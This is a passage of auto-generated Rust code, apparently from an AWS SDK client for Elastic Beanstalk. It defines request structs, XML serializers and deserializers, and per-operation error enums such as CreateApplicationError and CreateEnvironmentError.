params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.options_to_remove { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "OptionsToRemove"), field_value, ); } params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name); } } pub type UpdateDate = String; struct UpdateDateDeserializer; impl UpdateDateDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<UpdateDate, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to update an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct UpdateEnvironmentMessage { #[doc="<p>The name of the application with which the environment is associated.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk updates the description of this environment.</p>"] pub description: Option<Description>, #[doc="<p>The ID of the environment to update.</p> <p>If no environment with this ID exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to update. If no environment with this name exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p>Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The name of the group to which the target environment belongs. Specify a group name only if the environment's name is specified in an environment manifest and not with the environment name or environment ID parameters. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] pub group_name: Option<GroupName>, #[doc="<p>If specified, AWS Elastic Beanstalk updates the configuration set associated with the running environment and sets the specified configuration options to the requested value.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>A list of custom user-defined configuration options to remove from the configuration set for this environment.</p>"] pub options_to_remove: Option<OptionsSpecifierList>, #[doc="<p>This specifies the platform version that the environment will run after the environment is updated.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk deploys this configuration template to the environment. If no such configuration template is found, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>This specifies the tier to use to update the environment.</p> <p>Condition: At this time, if you change the tier version, name, or type, AWS Elastic Beanstalk returns <code>InvalidParameterValue</code> error. </p>"] pub tier: Option<EnvironmentTier>, #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk deploys the named application version to the environment. If no such application version is found, returns an <code>InvalidParameterValue</code> error. </p>"] pub version_label: Option<VersionLabel>, } /// Serialize `UpdateEnvironmentMessage` contents to a `SignedRequest`. struct UpdateEnvironmentMessageSerializer; impl UpdateEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.group_name { params.put(&format!("{}{}", prefix, "GroupName"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.options_to_remove { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "OptionsToRemove"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } if let Some(ref field_value) = obj.tier { EnvironmentTierSerializer::serialize( params, &format!("{}{}", prefix, "Tier"), field_value, ); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } pub type UserDefinedOption = bool; struct UserDefinedOptionDeserializer; impl UserDefinedOptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<UserDefinedOption, XmlParseError> { try!(start_element(tag_name, stack)); let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A list of validation messages for a specified configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct ValidateConfigurationSettingsMessage { #[doc="<p>The name of the application that the configuration template or environment belongs to.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the environment to validate the settings against.</p> <p>Condition: You cannot specify both this and a configuration template name.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>A list of the options and desired values to evaluate.</p>"] pub option_settings: ConfigurationOptionSettingsList, #[doc="<p>The name of the configuration template to validate the settings against.</p> <p>Condition: You cannot specify both this and an environment name.</p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `ValidateConfigurationSettingsMessage` contents to a `SignedRequest`. struct ValidateConfigurationSettingsMessageSerializer; impl ValidateConfigurationSettingsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &ValidateConfigurationSettingsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), &obj.option_settings, ); if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } #[doc="<p>An error or warning for a desired configuration option value.</p>"] #[derive(Default,Debug,Clone)] pub struct ValidationMessage { #[doc="<p>A message describing the error or warning.</p>"] pub message: Option<ValidationMessageString>, #[doc="<p>The namespace to which the option belongs.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>The name of the option.</p>"] pub option_name: Option<ConfigurationOptionName>, #[doc="<p>An indication of the severity of this message:</p> <ul> <li> <p> <code>error</code>: This message indicates that this is not a valid setting for an option.</p> </li> <li> <p> <code>warning</code>: This message is providing information you should take into account.</p> </li> </ul>"] pub severity: Option<ValidationSeverity>, } struct ValidationMessageDeserializer; impl ValidationMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ValidationMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Message" => { obj.message = Some(try!(ValidationMessageStringDeserializer::deserialize("Message", stack))); } "Namespace" => { obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack))); } "OptionName" => { obj.option_name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("OptionName", stack))); } "Severity" => { obj.severity = Some(try!(ValidationSeverityDeserializer::deserialize("Severity", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ValidationMessageString = String; struct ValidationMessageStringDeserializer; impl ValidationMessageStringDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessageString, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ValidationMessagesList = Vec<ValidationMessage>; struct ValidationMessagesListDeserializer; impl ValidationMessagesListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessagesList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ValidationMessageDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type ValidationSeverity = String; struct ValidationSeverityDeserializer; impl ValidationSeverityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationSeverity, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type VersionLabel = String; struct VersionLabelDeserializer; impl VersionLabelDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<VersionLabel, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type VersionLabels = Vec<VersionLabel>; /// Serialize `VersionLabels` contents to a `SignedRequest`. struct VersionLabelsSerializer; impl VersionLabelsSerializer { fn serialize(params: &mut Params, name: &str, obj: &VersionLabels) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } pub type VersionLabelsList = Vec<VersionLabel>; struct VersionLabelsListDeserializer; impl VersionLabelsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<VersionLabelsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(VersionLabelDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } /// Serialize `VersionLabelsList` contents to a `SignedRequest`. struct VersionLabelsListSerializer; impl VersionLabelsListSerializer { fn serialize(params: &mut Params, name: &str, obj: &VersionLabelsList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } /// Errors returned by AbortEnvironmentUpdate #[derive(Debug, PartialEq)] pub enum AbortEnvironmentUpdateError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl AbortEnvironmentUpdateError { pub fn from_body(body: &str) -> AbortEnvironmentUpdateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => AbortEnvironmentUpdateError::InsufficientPrivileges(String::from(parsed_error.message)),_ => AbortEnvironmentUpdateError::Unknown(String::from(body)) } }, Err(_) => AbortEnvironmentUpdateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for AbortEnvironmentUpdateError { fn from(err: XmlParseError) -> AbortEnvironmentUpdateError { let XmlParseError(message) = err; AbortEnvironmentUpdateError::Unknown(message.to_string()) } } impl From<CredentialsError> for AbortEnvironmentUpdateError { fn from(err: CredentialsError) -> AbortEnvironmentUpdateError { AbortEnvironmentUpdateError::Credentials(err) } } impl From<HttpDispatchError> for AbortEnvironmentUpdateError { fn from(err: HttpDispatchError) -> AbortEnvironmentUpdateError { AbortEnvironmentUpdateError::HttpDispatch(err) } } impl fmt::Display for AbortEnvironmentUpdateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for AbortEnvironmentUpdateError { fn description(&self) -> &str { match *self { AbortEnvironmentUpdateError::InsufficientPrivileges(ref cause) => cause, AbortEnvironmentUpdateError::Validation(ref cause) => cause, AbortEnvironmentUpdateError::Credentials(ref err) => err.description(), AbortEnvironmentUpdateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), AbortEnvironmentUpdateError::Unknown(ref cause) => cause } } } /// Errors returned by ApplyEnvironmentManagedAction #[derive(Debug, PartialEq)] pub enum ApplyEnvironmentManagedActionError { ///<p>A generic service exception has occurred.</p> ElasticBeanstalkService(String), ///<p>Cannot modify the managed action in its current state.</p> ManagedActionInvalidState(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ApplyEnvironmentManagedActionError { pub fn from_body(body: &str) -> ApplyEnvironmentManagedActionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "ElasticBeanstalkServiceException" => ApplyEnvironmentManagedActionError::ElasticBeanstalkService(String::from(parsed_error.message)),"ManagedActionInvalidStateException" => ApplyEnvironmentManagedActionError::ManagedActionInvalidState(String::from(parsed_error.message)),_ => ApplyEnvironmentManagedActionError::Unknown(String::from(body)) } }, Err(_) => ApplyEnvironmentManagedActionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ApplyEnvironmentManagedActionError { fn from(err: XmlParseError) -> ApplyEnvironmentManagedActionError { let XmlParseError(message) = err; ApplyEnvironmentManagedActionError::Unknown(message.to_string()) } } impl From<CredentialsError> for ApplyEnvironmentManagedActionError { fn from(err: CredentialsError) -> ApplyEnvironmentManagedActionError { ApplyEnvironmentManagedActionError::Credentials(err) } } impl From<HttpDispatchError> for ApplyEnvironmentManagedActionError { fn from(err: HttpDispatchError) -> ApplyEnvironmentManagedActionError { ApplyEnvironmentManagedActionError::HttpDispatch(err) } } impl fmt::Display for ApplyEnvironmentManagedActionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ApplyEnvironmentManagedActionError { fn description(&self) -> &str { match *self { ApplyEnvironmentManagedActionError::ElasticBeanstalkService(ref cause) => cause, ApplyEnvironmentManagedActionError::ManagedActionInvalidState(ref cause) => cause, ApplyEnvironmentManagedActionError::Validation(ref cause) => cause, ApplyEnvironmentManagedActionError::Credentials(ref err) => err.description(), ApplyEnvironmentManagedActionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ApplyEnvironmentManagedActionError::Unknown(ref cause) => cause } } } /// Errors returned by CheckDNSAvailability #[derive(Debug, PartialEq)] pub enum CheckDNSAvailabilityError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CheckDNSAvailabilityError { pub fn from_body(body: &str) -> CheckDNSAvailabilityError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { _ => CheckDNSAvailabilityError::Unknown(String::from(body)) } }, Err(_) => CheckDNSAvailabilityError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CheckDNSAvailabilityError { fn from(err: XmlParseError) -> CheckDNSAvailabilityError { let XmlParseError(message) = err; CheckDNSAvailabilityError::Unknown(message.to_string()) } } impl From<CredentialsError> for CheckDNSAvailabilityError { fn from(err: CredentialsError) -> CheckDNSAvailabilityError { CheckDNSAvailabilityError::Credentials(err) } } impl From<HttpDispatchError> for CheckDNSAvailabilityError { fn from(err: HttpDispatchError) -> CheckDNSAvailabilityError { CheckDNSAvailabilityError::HttpDispatch(err) } } impl fmt::Display for CheckDNSAvailabilityError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CheckDNSAvailabilityError { fn description(&self) -> &str { match *self { CheckDNSAvailabilityError::Validation(ref cause) => cause, CheckDNSAvailabilityError::Credentials(ref err) => err.description(), CheckDNSAvailabilityError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CheckDNSAvailabilityError::Unknown(ref cause) => cause } } } /// Errors returned by ComposeEnvironments #[derive(Debug, PartialEq)] pub enum ComposeEnvironmentsError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of environments.</p> TooManyEnvironments(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl ComposeEnvironmentsError { pub fn from_body(body: &str) -> ComposeEnvironmentsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => ComposeEnvironmentsError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyEnvironmentsException" => ComposeEnvironmentsError::TooManyEnvironments(String::from(parsed_error.message)),_ => ComposeEnvironmentsError::Unknown(String::from(body)) } }, Err(_) => ComposeEnvironmentsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ComposeEnvironmentsError { fn from(err: XmlParseError) -> ComposeEnvironmentsError { let XmlParseError(message) = err; ComposeEnvironmentsError::Unknown(message.to_string()) } } impl From<CredentialsError> for ComposeEnvironmentsError { fn from(err: CredentialsError) -> ComposeEnvironmentsError { ComposeEnvironmentsError::Credentials(err) } } impl From<HttpDispatchError> for ComposeEnvironmentsError { fn from(err: HttpDispatchError) -> ComposeEnvironmentsError { ComposeEnvironmentsError::HttpDispatch(err) } } impl fmt::Display for ComposeEnvironmentsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ComposeEnvironmentsError { fn description(&self) -> &str { match *self { ComposeEnvironmentsError::InsufficientPrivileges(ref cause) => cause, ComposeEnvironmentsError::TooManyEnvironments(ref cause) => cause, ComposeEnvironmentsError::Validation(ref cause) => cause, ComposeEnvironmentsError::Credentials(ref err) => err.description(), ComposeEnvironmentsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ComposeEnvironmentsError::Unknown(ref cause) => cause } } } /// Errors returned by CreateApplication #[derive(Debug, PartialEq)] pub enum CreateApplicationError { ///<p>The specified account has reached its limit of applications.</p> TooManyApplications(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateApplicationError { pub fn from_body(body: &str) -> CreateApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "TooManyApplicationsException" => CreateApplicationError::TooManyApplications(String::from(parsed_error.message)),_ => CreateApplicationError::Unknown(String::from(body)) } }, Err(_) => CreateApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateApplicationError { fn from(err: XmlParseError) -> CreateApplicationError { let XmlParseError(message) = err; CreateApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateApplicationError { fn from(err: CredentialsError) -> CreateApplicationError { CreateApplicationError::Credentials(err) } } impl From<HttpDispatchError> for CreateApplicationError { fn from(err: HttpDispatchError) -> CreateApplicationError { CreateApplicationError::HttpDispatch(err) } } impl fmt::Display for CreateApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateApplicationError { fn description(&self) -> &str { match *self { CreateApplicationError::TooManyApplications(ref cause) => cause, CreateApplicationError::Validation(ref cause) => cause, CreateApplicationError::Credentials(ref err) => err.description(), CreateApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by CreateApplicationVersion #[derive(Debug, PartialEq)] pub enum CreateApplicationVersionError { ///<p>AWS CodeBuild is not available in the specified region.</p> CodeBuildNotInServiceRegion(String), ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified S3 bucket does not belong to the S3 region in which the service is running. The following regions are supported:</p> <ul> <li> <p>IAD/us-east-1</p> </li> <li> <p>PDX/us-west-2</p> </li> <li> <p>DUB/eu-west-1</p> </li> </ul> S3LocationNotInServiceRegion(String), ///<p>The specified account has reached its limit of application versions.</p> TooManyApplicationVersions(String), ///<p>The specified account has reached its limit of applications.</p> TooManyApplications(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateApplicationVersionError { pub fn from_body(body: &str) -> CreateApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "CodeBuildNotInServiceRegionException" => CreateApplicationVersionError::CodeBuildNotInServiceRegion(String::from(parsed_error.message)),"InsufficientPrivilegesException" => CreateApplicationVersionError::InsufficientPrivileges(String::from(parsed_error.message)),"S3LocationNotInServiceRegionException" => CreateApplicationVersionError::S3LocationNotInServiceRegion(String::from(parsed_error.message)),"TooManyApplicationVersionsException" => CreateApplicationVersionError::TooManyApplicationVersions(String::from(parsed_error.message)),"TooManyApplicationsException" => CreateApplicationVersionError::TooManyApplications(String::from(parsed_error.message)),_ => CreateApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => CreateApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateApplicationVersionError { fn from(err: XmlParseError) -> CreateApplicationVersionError { let XmlParseError(message) = err; CreateApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateApplicationVersionError { fn from(err: CredentialsError) -> CreateApplicationVersionError { CreateApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for CreateApplicationVersionError { fn from(err: HttpDispatchError) -> CreateApplicationVersionError { CreateApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for CreateApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateApplicationVersionError { fn description(&self) -> &str { match *self { CreateApplicationVersionError::CodeBuildNotInServiceRegion(ref cause) => cause, CreateApplicationVersionError::InsufficientPrivileges(ref cause) => cause, CreateApplicationVersionError::S3LocationNotInServiceRegion(ref cause) => cause, CreateApplicationVersionError::TooManyApplicationVersions(ref cause) => cause, CreateApplicationVersionError::TooManyApplications(ref cause) => cause, CreateApplicationVersionError::Validation(ref cause) => cause, CreateApplicationVersionError::Credentials(ref err) => err.description(), CreateApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by CreateConfigurationTemplate #[derive(Debug, PartialEq)] pub enum CreateConfigurationTemplateError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String), ///<p>The specified account has reached its limit of configuration templates.</p> TooManyConfigurationTemplates(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateConfigurationTemplateError { pub fn from_body(body: &str) -> CreateConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => CreateConfigurationTemplateError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => CreateConfigurationTemplateError::TooManyBuckets(String::from(parsed_error.message)),"TooManyConfigurationTemplatesException" => CreateConfigurationTemplateError::TooManyConfigurationTemplates(String::from(parsed_error.message)),_ => CreateConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => CreateConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateConfigurationTemplateError { fn from(err: XmlParseError) -> CreateConfigurationTemplateError { let XmlParseError(message) = err; CreateConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateConfigurationTemplateError { fn from(err: CredentialsError) -> CreateConfigurationTemplateError { CreateConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for CreateConfigurationTemplateError { fn from(err: HttpDispatchError) -> CreateConfigurationTemplateError { CreateConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for CreateConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateConfigurationTemplateError { fn description(&self) -> &str { match *self { CreateConfigurationTemplateError::InsufficientPrivileges(ref cause) => cause, CreateConfigurationTemplateError::TooManyBuckets(ref cause) => cause, CreateConfigurationTemplateError::TooManyConfigurationTemplates(ref cause) => cause, CreateConfigurationTemplateError::Validation(ref cause) => cause, CreateConfigurationTemplateError::Credentials(ref err) => err.description(), CreateConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by CreateEnvironment #[derive(Debug, PartialEq)] pub enum CreateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of environments.</p> TooManyEnvironments(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateEnvironmentError { pub fn from_body(body: &str) -> CreateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] { "InsufficientPrivilegesException" => CreateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyEnvironmentsException" => CreateEnvironmentError::TooManyEnvironments(String::from(parsed_error.message)),_ => CreateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => CreateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateEnvironmentError { fn from(err: XmlParseError) -> CreateEnvironmentError { let XmlParseError(message) = err; CreateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateEnvironmentError { fn from(err: CredentialsError) -> CreateEnvironmentError { CreateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for CreateEnvironmentError { fn from(err: HttpDispatchError) -> CreateEnvironmentError { CreateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for CreateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateEnvironmentError { fn description(&self) -> &str { match *self { CreateEnvironmentError::InsufficientPrivileges(ref cause) => cause, CreateEnvironmentError::TooManyEnvironments(ref cause) => cause, CreateEnvironmentError::Validation(ref cause) => cause, CreateEnvironmentError::Credentials(ref err) => err.description(), CreateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by CreateStorageLocation #[derive(Debug, PartialEq)] pub enum CreateStorageLocationError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account does not have a subscription to Amazon S3.</p> 